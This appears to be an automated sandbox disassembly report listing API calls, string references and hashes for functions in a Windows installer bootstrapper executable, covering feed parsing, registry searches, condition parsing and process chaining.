                                                                                                                                                              • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                                                              • String ID: %ls /pipe %ls$D$D$~$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                              • API String ID: 1533322865-2726749349
                                                                                                                                                              • Opcode ID: 0caef6e80a24fdab0f4c2b4561293df17b987a93886c78da2d80fefc88edae38
                                                                                                                                                              • Instruction ID: b58ca6cba94384feb065325ce8c6030ce20fc8fbaa4e318beb4827672f375cd5
                                                                                                                                                              • Opcode Fuzzy Hash: 0caef6e80a24fdab0f4c2b4561293df17b987a93886c78da2d80fefc88edae38
                                                                                                                                                              • Instruction Fuzzy Hash: D3A19F72D01268EFDB319BA5CC45BAEB7B8FB08720F114169E918F7252D7399D408F91
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 0080755D
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807726
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008077C3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                                                              • String ID: ($@$`<u$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                                                              • API String ID: 1555028553-639730868
                                                                                                                                                              • Opcode ID: c4a12aa1f4ff3527408558349061212759ace5d46fbcd1198c84fb66a9bf77bd
                                                                                                                                                              • Instruction ID: 7abb7b490bfb778dc1650225fa008ff708c813c407dc086f52ad63d00dae972e
                                                                                                                                                              • Opcode Fuzzy Hash: c4a12aa1f4ff3527408558349061212759ace5d46fbcd1198c84fb66a9bf77bd
                                                                                                                                                              • Instruction Fuzzy Hash: AEB14B31D4922ABBDB919BA4CC42FAAB664FB04770F200355F621E62D1D771FA50DBA0
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00823E78,000000FF,?,?,?), ref: 008071D4
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008071F9
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00807219
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00807235
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0080725D
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00807279
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 008072B2
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 008072EB
                                                                                                                                                                • Part of subcall function 00806D50: SysFreeString.OLEAUT32(00000000), ref: 00806E89
                                                                                                                                                                • Part of subcall function 00806D50: SysFreeString.OLEAUT32(00000000), ref: 00806EC8
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0080736F
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0080741F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Compare$Free
                                                                                                                                                              • String ID: ($`<u$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                              • API String ID: 318886736-2569518843
                                                                                                                                                              • Opcode ID: 972fe7e44fb66b8852f4dc56cc35502d1cfaddd3d0c6936caffd8574db2d12b8
                                                                                                                                                              • Instruction ID: 6547564cd418cd978cc57fe3a13f80862143a16e943f5dee3d0bbf7d51e762bd
                                                                                                                                                              • Opcode Fuzzy Hash: 972fe7e44fb66b8852f4dc56cc35502d1cfaddd3d0c6936caffd8574db2d12b8
                                                                                                                                                              • Instruction Fuzzy Hash: 00A18D31D0862AFBDB619A94CC41FAEBA64FB04730F214365F921E62D1DB70FA50DB91
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA45A
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA480
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 007CA768
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to clear variable., xrefs: 007CA4D8
                                                                                                                                                              • Unsupported registry key value type. Type = '%u', xrefs: 007CA608
                                                                                                                                                              • Failed to allocate string buffer., xrefs: 007CA667
                                                                                                                                                              • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA740
                                                                                                                                                              • Failed to query registry key value., xrefs: 007CA5DA
                                                                                                                                                              • Failed to change value type., xrefs: 007CA70F
                                                                                                                                                              • Failed to allocate memory registry value., xrefs: 007CA587
                                                                                                                                                              • Failed to get expand environment string., xrefs: 007CA6DD
                                                                                                                                                              • Failed to format key string., xrefs: 007CA465
                                                                                                                                                              • search.cpp, xrefs: 007CA54A, 007CA57D, 007CA5D0, 007CA6D3
                                                                                                                                                              • Failed to open registry key., xrefs: 007CA4ED
                                                                                                                                                              • Failed to query registry key value size., xrefs: 007CA554
                                                                                                                                                              • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 007CA51C
                                                                                                                                                              • Failed to read registry value., xrefs: 007CA6F6
                                                                                                                                                              • Failed to set variable., xrefs: 007CA72B
                                                                                                                                                              • Registry key not found. Key = '%ls', xrefs: 007CA4B4
                                                                                                                                                              • Failed to format value string., xrefs: 007CA48B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16$Close
                                                                                                                                                              • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                              • API String ID: 2348241696-3124384294
                                                                                                                                                              • Opcode ID: 9430093391d4c2cbb2c5c96ee76da7993da734d493133993ac4aa0c4c28fed27
                                                                                                                                                              • Instruction ID: 4d983ca8998cdda2ba0f9d5f440518f776df6ce087a68a8a6c1182faa2fdbb64
                                                                                                                                                              • Opcode Fuzzy Hash: 9430093391d4c2cbb2c5c96ee76da7993da734d493133993ac4aa0c4c28fed27
                                                                                                                                                              • Instruction Fuzzy Hash: 99A10572D0052DFBCB229AA4CC49FAEBB78FB08715F15811DF910F6290D73999109BD2
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C5795
                                                                                                                                                              • lstrlenW.KERNEL32(000002C0,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C579F
                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 007C59A7
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C5C4A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                                                              • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                              • API String ID: 1026845265-2050445661
                                                                                                                                                              • Opcode ID: b8f76767b03fc40ccd08d24fccb9557d735025cc485538caff87f5236945d03f
                                                                                                                                                              • Instruction ID: 770ccb94d5553f3ac3cdc345ed7182f19138350dbe4c6b89376b9889890114f5
                                                                                                                                                              • Opcode Fuzzy Hash: b8f76767b03fc40ccd08d24fccb9557d735025cc485538caff87f5236945d03f
                                                                                                                                                              • Instruction Fuzzy Hash: 8CF19571901619EADB209FA58C45FAF7BA4FB04B20F15812DFD14EB241D73DAE818BA1
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,007ED558,?,?,?), ref: 007ECEC7
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007ED558,?,?,?), ref: 007ECED4
                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 007ED13C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                                                              • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                              • API String ID: 3944734951-2991465304
                                                                                                                                                              • Opcode ID: fe721f0d93789ac844b2e2299787bde118b788d4c648b0409556963377a99d17
                                                                                                                                                              • Instruction ID: 6af5b48215ff5fd594298e8d6b8b6fe1c04099b13413b3ad14887e3a8126a31d
                                                                                                                                                              • Opcode Fuzzy Hash: fe721f0d93789ac844b2e2299787bde118b788d4c648b0409556963377a99d17
                                                                                                                                                              • Instruction Fuzzy Hash: 8C81F576A42766FBC7329B668C09F5A7AA4FF08720F114129FD14AB341E738DD408AE4
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 008032F3: VariantInit.OLEAUT32(?), ref: 00803309
                                                                                                                                                                • Part of subcall function 008032F3: SysAllocString.OLEAUT32(?), ref: 00803325
                                                                                                                                                                • Part of subcall function 008032F3: VariantClear.OLEAUT32(?), ref: 008033AC
                                                                                                                                                                • Part of subcall function 008032F3: SysFreeString.OLEAUT32(00000000), ref: 008033B7
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0080CA9C,?,?,Action,?,?,?,00000000,?), ref: 007CEB13
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 007CEB5D
                                                                                                                                                              Strings
                                                                                                                                                              • RelatedBundle, xrefs: 007CEA50
                                                                                                                                                              • Addon, xrefs: 007CEB9A
                                                                                                                                                              • Failed to resize Detect code array in registration, xrefs: 007CEC2E
                                                                                                                                                              • Failed to resize Upgrade code array in registration, xrefs: 007CEC35
                                                                                                                                                              • cabinet.dll, xrefs: 007CEBBA
                                                                                                                                                              • version.dll, xrefs: 007CEB70
                                                                                                                                                              • Upgrade, xrefs: 007CEB50
                                                                                                                                                              • Detect, xrefs: 007CEB04
                                                                                                                                                              • comres.dll, xrefs: 007CEB26
                                                                                                                                                              • Failed to resize Addon code array in registration, xrefs: 007CEC3C
                                                                                                                                                              • Invalid value for @Action: %ls, xrefs: 007CEC52
                                                                                                                                                              • Action, xrefs: 007CEAD0
                                                                                                                                                              • Failed to resize Patch code array in registration, xrefs: 007CEC43
                                                                                                                                                              • Patch, xrefs: 007CEBDD
                                                                                                                                                              • Failed to get next RelatedBundle element., xrefs: 007CEC70
                                                                                                                                                              • Failed to get @Id., xrefs: 007CEC62
                                                                                                                                                              • Failed to get @Action., xrefs: 007CEC69
                                                                                                                                                              • Failed to get RelatedBundle nodes, xrefs: 007CEA72
                                                                                                                                                              • Failed to get RelatedBundle element count., xrefs: 007CEA97
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                                                              • API String ID: 702752599-259800149
                                                                                                                                                              • Opcode ID: f3e25260cdba35c8b9f94925c8c6d54503455998f42ff253b6772bd6082a4f10
                                                                                                                                                              • Instruction ID: e3a35bcd6f93c25c8817d21c738750be3835c968fc5e2a94f1c704c773cea631
                                                                                                                                                              • Opcode Fuzzy Hash: f3e25260cdba35c8b9f94925c8c6d54503455998f42ff253b6772bd6082a4f10
                                                                                                                                                              • Instruction Fuzzy Hash: 79716D71A05616BBCB20DA94CD45FAEB7B8FF04724F20425CE921A62C1D778AE51CBA0
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D46F3
                                                                                                                                                              • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D4714
                                                                                                                                                              • GetLastError.KERNEL32(?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D471A
                                                                                                                                                              • ReadFile.KERNEL32(feclient.dll,00000000,0080B518,?,00000000,00000000,0080B519,?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D47A8
                                                                                                                                                              • GetLastError.KERNEL32(?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D47AE
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                                                              • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                                                                                                              • API String ID: 1233551569-452622383
                                                                                                                                                              • Opcode ID: 103e36bcddebb65b2a635d9c595810ad1c98817118327503a81fb854a8f9c64f
                                                                                                                                                              • Instruction ID: 20d818f13b1d2c822e4f7c9954c9a777a5c675526cadc947e397b6353fc733d6
                                                                                                                                                              • Opcode Fuzzy Hash: 103e36bcddebb65b2a635d9c595810ad1c98817118327503a81fb854a8f9c64f
                                                                                                                                                              • Instruction Fuzzy Hash: 70519376D80266B7DB219A948C46FAE7678FF01B60F11416ABE20FB380D7789D4096E1
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                                                              • API String ID: 760788290-1911311241
                                                                                                                                                              • Opcode ID: 13eb5f69bf8e54e4286c39ed2fcef4e72ef62111350de11c0d56c67f8961977b
                                                                                                                                                              • Instruction ID: f57ad5b4a9aee3059e5b5ffcf4de6c679a663ebe9227bdaa172ad211f50471e5
                                                                                                                                                              • Opcode Fuzzy Hash: 13eb5f69bf8e54e4286c39ed2fcef4e72ef62111350de11c0d56c67f8961977b
                                                                                                                                                              • Instruction Fuzzy Hash: 0741FDB1E867A2B6C62555658C02FAAB25CFF1C730F201321B934F73C3DB6CAD429291
                                                                                                                                                              APIs
                                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,560080DB,00000001,?,007C9946,?,00000000,00000000,?,?,007C992E,?,?,00000000,?), ref: 007C8FB2
                                                                                                                                                              Strings
                                                                                                                                                              • AND, xrefs: 007C92BC
                                                                                                                                                              • condition.cpp, xrefs: 007C9084, 007C914E, 007C91CA, 007C922E, 007C936C, 007C93B0, 007C93F4
                                                                                                                                                              • Failed to set symbol value., xrefs: 007C9060
                                                                                                                                                              • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 007C93C4
                                                                                                                                                              • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 007C9162
                                                                                                                                                              • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 007C91DE
                                                                                                                                                              • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 007C9098
                                                                                                                                                              • NOT, xrefs: 007C92DB
                                                                                                                                                              • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 007C9380
                                                                                                                                                              • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 007C9242
                                                                                                                                                              • -, xrefs: 007C9118
                                                                                                                                                              • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 007C9408
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringType
                                                                                                                                                              • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                              • API String ID: 4177115715-3594736606
                                                                                                                                                              • Opcode ID: 8ffec515ecba6ffdb361dd5fd1946efb58b36095197c2b8f3f601b394e777d75
                                                                                                                                                              • Instruction ID: be62ec626ef7804d5c1730cf8862e5a5cf8b1d6da3ff9a705952f8c3fa38ff0b
                                                                                                                                                              • Opcode Fuzzy Hash: 8ffec515ecba6ffdb361dd5fd1946efb58b36095197c2b8f3f601b394e777d75
                                                                                                                                                              • Instruction Fuzzy Hash: 3FF1D271600346FBDBA88F94C88DFAA7BA4FB04700F10854DFA159A685D3BDDB91CB90
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007CD4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4B7
                                                                                                                                                                • Part of subcall function 007CD4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 007CD4C6
                                                                                                                                                                • Part of subcall function 007CD4A8: LeaveCriticalSection.KERNEL32(000000D0,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4DB
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,007D57BD,?,00000000,00000000), ref: 007D6E34
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,007C4522,?,0080B500,?,007C4846,?,?), ref: 007D6E43
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007C4522,?,0080B500,?,007C4846,?,?), ref: 007D6EA0
                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 007D6F92
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007D6F9B
                                                                                                                                                              • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 007D6FB5
                                                                                                                                                                • Part of subcall function 007EBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 007EBD0A
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                              • String ID: "E|$Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$FH|$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                                                                                                              • API String ID: 2169948125-3642455306
                                                                                                                                                              • Opcode ID: a1efd5763e7b78e96988f21f3c99a3401346bb289d036ec5eae75900a9a62177
                                                                                                                                                              • Instruction ID: 8435d073067ef2c58f3725ca6d248f1c14ce973176daef6f1bcd4cdd87f4b64b
                                                                                                                                                              • Opcode Fuzzy Hash: a1efd5763e7b78e96988f21f3c99a3401346bb289d036ec5eae75900a9a62177
                                                                                                                                                              • Instruction Fuzzy Hash: 81C1BE72901615EADF119F64D889BEA3BB9FF04714F04417BFD09AE342DB789980CBA1
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 007E1CB8
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 007E1CD6
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                              • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                                                                                                                              • API String ID: 2664528157-1714101571
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00807857
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 0080787C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 0080789C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008078CF
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 008078EB
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807916
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0080798D
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008079D9
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Compare$Free
                                                                                                                                                              • String ID: `<u$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                              • API String ID: 318886736-782967201
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00808161
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0080817C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0080821F
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0080B518,00000000), ref: 0080825E
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 008082B1
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,0080B518,000000FF,true,000000FF), ref: 008082CF
